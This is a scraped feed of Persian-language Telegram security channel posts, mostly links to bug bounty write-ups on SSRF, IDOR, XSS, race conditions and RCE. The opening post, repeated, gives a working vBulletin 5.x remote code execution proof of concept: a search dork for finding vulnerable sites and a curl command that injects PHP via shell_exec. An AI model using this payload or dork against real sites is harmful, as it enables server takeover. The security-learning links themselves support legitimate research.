Forwarded from امنیت اطلاعات
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
همه چیز در خصوص SSRF
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
RACE Condition vulnerability found in bug-bounty program
https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43
#RC
@web_priv8
https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43
#RC
@web_priv8
Medium
RACE Condition vulnerability found in bug-bounty program
I have recently identified RACE condition vulnerability in Bug bounty program.
Forwarded from ناویا، ماشین کاوش اپلای
به تعداد راههای رسیدن به خدا، راه دور زدن مکانیزمهای امنیتی هم هست.
توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راههایی رو پیدا کنه که میشه ازش در دور زدن مکانیزمهای امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راههایی رو پیدا کنه که میشه ازش در دور زدن مکانیزمهای امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
JSON Hijacking, SOP Bypass Technic with Cache-Control
https://www.hahwul.com/2020/01/12/json-hijacking-sop-bypass-technic-with-cache/
https://hackerone.com/reports/761726
#SOP
#CORS
#Bypass
@web_priv8
https://www.hahwul.com/2020/01/12/json-hijacking-sop-bypass-technic-with-cache/
https://hackerone.com/reports/761726
#SOP
#CORS
#Bypass
@web_priv8
Brute force directory & file to RCE
https://twitter.com/r00t98/status/1299449105350090753
#RCE
#BugBounty
#BugBountyTip
@web_priv8
https://twitter.com/r00t98/status/1299449105350090753
#RCE
#BugBounty
#BugBountyTip
@web_priv8
How to Create Unlimited Rotating IP Addresses with AWS
https://medium.com/@devinjaystokes/using-proxycannon-ng-to-create-unlimited-rotating-proxies-fccffa70a728
#AWS
#Cloud
@web_priv8
https://medium.com/@devinjaystokes/using-proxycannon-ng-to-create-unlimited-rotating-proxies-fccffa70a728
#AWS
#Cloud
@web_priv8
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
اینجا یاد میگیرید چطور FUFF و burpsuite رو با هم ترکیب کنید
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
کشف آسیب پذیری RCE در پیام رسان cisco jabber
https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه
#rce
#cisco
#xss
@sec_nerd
https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه
#rce
#cisco
#xss
@sec_nerd
Forwarded from امنیت اطلاعات
نکات کاربردی در خصوص حملات IDOR
https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
#idor
#bugbounty
#web
@sec_nerd
https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
#idor
#bugbounty
#web
@sec_nerd
rural-tune-378 on Notion
IDOR: Attack vectors, exploitation, bypasses and chains | Notion
API12019: Testing for IDOR/Broken object level authorization:
Forwarded from امنیت اطلاعات
کشف باگ XSS در google maps و دریافت جایزه ی ۱۰ هزار دلاری
https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps
#bugbounty
#google
#xss
@sec_nerd
https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps
#bugbounty
#xss
@sec_nerd
Forwarded from ناویا، ماشین کاوش اپلای
سوالات و جوابهای کامل مسابقهی نفوذ و امنیت گوگل ۲۰۲۰ اینجا آپلود شده. طوری که با منبع کد سوالات میتونید خودتون سوال رو بازعملآوری کنید. در زمینههای مختلفی از جمله امنیت وب، مهندسی معکوس، اکسپلویتینگ، سختافزار، رمزنگاری و دور زنی سندباکس (کروم) سوالات توزیع شده.
@offsecmag
@offsecmag
Forwarded from امنیت اطلاعات
کشف دوباره آسیب پذیری RCE بر روی یکی از سرویس های فیسبوک توسط Orange Tsai
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
لینک ویدیو:
https://www.youtube.com/watch?v=hGTLIIOb14A
#facebook
#Bugbounty
#rce
@sec_nerd
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
لینک ویدیو:
https://www.youtube.com/watch?v=hGTLIIOb14A
#Bugbounty
#rce
@sec_nerd